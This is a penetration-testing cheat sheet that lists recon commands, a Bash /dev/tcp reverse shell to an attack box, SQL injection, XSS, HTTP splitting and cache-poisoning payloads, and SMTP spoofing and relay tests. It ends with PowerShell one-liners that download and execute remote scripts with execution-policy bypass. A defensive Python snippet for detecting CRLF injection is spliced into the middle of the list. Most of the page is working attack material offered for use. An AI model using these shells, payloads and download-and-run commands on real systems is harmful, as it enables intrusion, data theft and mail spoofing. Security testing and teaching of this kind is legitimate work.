Last updated
nmap -vv -Pn -A -sC -sS -T 4 -p- 10.0.0.1
Fingerprint server
telnet ip_address port
Firefox plugins
All
Specific
Crawl website
lynx [options] startfile/URL
Options include: -traversal, -crawl, -dump, -image_links, -source
metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
Web Directory enumeration
nikto [-h target] [options]
Manual Tests
Install Backdoors
ASP
Assorted
Perl
PHP
Python
TCL
Bash Connect Back Shell
Attack Box: nc -l -p Port -vvv
Victim: $ exec 5<>/dev/tcp/IP_Address/Port
Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
Attack Box: nc -l -p Port -vvv
Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdin
Victim: $ exec 1>&0 # Next we copy stdin to stdout
Victim: $ exec 2>&0 # And finally stdin to stderr
Victim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0
Method Testing
nc IP_Address Port
HEAD / HTTP/1.0
OPTIONS / HTTP/1.0
PROPFIND / HTTP/1.0
TRACE / HTTP/1.1
PUT
POST HTTP/1.x
Upload Files
curl
curl -u <username:password> -T file_to_upload <Target_URL>
curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>
put.pl -h target -r /remote_file_name -f local_file_name
webdav
View Page Source
Hidden Values
Developer Remarks
Extraneous Code
Passwords!
NULL or null
Possible error messages returned.
' , " , ; , <!
Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.
- , = , + , "
Used to craft SQL Injection queries.
' , & , ! , | , < , >
Used to find command execution vulnerabilities.
"><script>alert(1)</script>
Basic Cross-Site Scripting Checks.
%0d%0a
Carriage Return (%0d) and Line Feed (%0a)
HTTP Splitting
language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesirable content here</html>
i.e. once decoded, the injected value reads:
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 47

<html>blah</html>
Cache Poisoning
language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesirable content here</html>
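Both the HTTP splitting and the cache poisoning payloads above work only because a server copies a percent-encoded parameter into a response header without rejecting CR and LF. The following is an added defensive example, not part of the original cheat sheet: it decodes a value the way a server would, shows the lines the decoded value would turn into (the "i.e." view above, computed rather than typed), and implements the check a server should apply before placing user input in a header. The parameter name, function names and the sample value are constructed for this example.

```python
"""Detect and reject CRLF (header-injection) payloads before they reach a response header.

Added example; the payload is reproduced from the page only as test input.
"""
from urllib.parse import unquote

# Constructed sample: the percent-encoded value a client might send in the
# "language" query parameter that a vulnerable application echoes into a header.
SPLITTING_PAYLOAD = (
    "foobar%0d%0aContent-Length:%200%0d%0a%0d%0a"
    "HTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
    "Content-Length:%2047%0d%0a%0d%0a<html>Insert undesirable content here</html>"
)

# Characters that must never appear in a header value: CR, LF and NUL.
FORBIDDEN = ("\r", "\n", "\0")


def decoded_lines(value: str) -> list:
    """Decode the value once and split on CRLF.

    Each element is a line the response would contain if the value were copied
    verbatim into a header; a blank element marks where the header block ends
    and a body (or a second, attacker-controlled response) would begin.
    """
    return unquote(value).split("\r\n")


def contains_crlf(value: str) -> bool:
    """True if the value, after one round of percent-decoding, carries CR, LF or NUL."""
    decoded = unquote(value)
    return any(ch in decoded for ch in FORBIDDEN)


def safe_header_value(value: str) -> str:
    """Return the decoded value if it is safe to place in a response header.

    Raises ValueError instead of silently stripping, so the rejection is visible
    in application logs and the request can be counted as an injection attempt.
    """
    if contains_crlf(value):
        raise ValueError("control characters are not allowed in header values")
    return unquote(value)


if __name__ == "__main__":
    for i, line in enumerate(decoded_lines(SPLITTING_PAYLOAD)):
        print(f"{i}: {line!r}")
    print("legitimate value:", safe_header_value("en-US"))
    try:
        safe_header_value(SPLITTING_PAYLOAD)
    except ValueError as exc:
        print("rejected:", exc)
```

Decoding once before the check matters: a check run on the raw, still-encoded string would see `%0d%0a` as harmless printable characters. Frameworks that set headers through a proper API normally perform this rejection for you; the check is for code that builds raw responses or writes headers from its own string concatenation.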
%7f , %ff
byte-length overflows; maximum 7- and 8-bit values.
-1, other
Integer overflow and underflow vulnerabilities.
%n , %x , %s
Testing for format string vulnerabilities.
../
Directory Traversal Vulnerabilities.
% , _, *
Wildcard characters can sometimes present DoS issues or information disclosure.
Ax1024+
Overflow vulnerabilities.
Automated table and column iteration
./orderby.py
./d3sqlfuzz.py --
Port 25 open
Fingerprint server
telnet ip_address 25 (banner grab)
Mail Server Testing
Enumerate users
VRFY username (verifies if username exists - enumeration of accounts)
EXPN username (verifies if username is valid - enumeration of accounts)
Mail Spoof Test
HELO anything
MAIL FROM: spoofed_address
RCPT TO: valid_mail_account
DATA
.
QUIT
Mail Relay Test
HELO anything
Identical to/from - mail from: <nobody@domain> rcpt to: <nobody@domain>
Unknown domain - mail from: <user@unknown_domain>
Domain not present - mail from: <user@localhost>
Domain not supplied - mail from: <user>
Source address omission - mail from: <> rcpt to: <nobody@recipient_domain>
Use IP address of target server - mail from: <user@IP_Address> rcpt to: <nobody@recipient_domain>
Use double quotes - mail from: <user@domain> rcpt to: <"user@recipient-domain">
Use IP address of the target server - mail from: <user@domain> rcpt to: <nobody@recipient_domain@[IP Address]>
Disparate formatting - mail from: <user@[IP Address]> rcpt to: <@domain:nobody@recipient-domain>
Disparate formatting 2 - mail from: <user@[IP Address]> rcpt to: <recipient_domain!nobody@[IP Address]>
Examine Configuration Files
sendmail.cf
submit.cf
Is port 21 open?
Fingerprint server
telnet ip_address 21 (Banner grab)
Run command ftp ip_address
ftp@example.com
Check for anonymous access
ftp ip_address
Username: anonymous OR anon
Password: any@email.com
Password guessing
Examine configuration files
ftpusers
proftpd.conf
Enable Remote Desktop (requires administrative privileges)
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
Enable Firewall for Remote Desktop
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
Add a firewall rule
powershell.exe -command New-NetFirewallRule -DisplayName "Allow Inbound Port 80" -Direction Inbound -LocalPort 80 -Protocol TCP -Action Allow
powershell.exe -command New-NetFirewallRule -DisplayName "Block Outbound Port 80" -Direction Outbound -LocalPort 80 -Protocol TCP -Action Block
View all services
powershell.exe -command Get-Service
Restart service
powershell.exe -command Restart-Service
Configure the DNS server
powershell.exe -command Set-DnsClientServerAddress -InterfaceAlias "Ethernet" -ServerAddresses 8.8.8.8
Get a Process Listing
powershell.exe -command Get-Process
Get a list of all computers from Active Directory
Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1');Get-NetComputers
Collection of information from the system, registries, and other information
Powershell.exe -exec bypass IEX "(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/nishang/master/Gather/GetInformation.ps1'); Get-Information"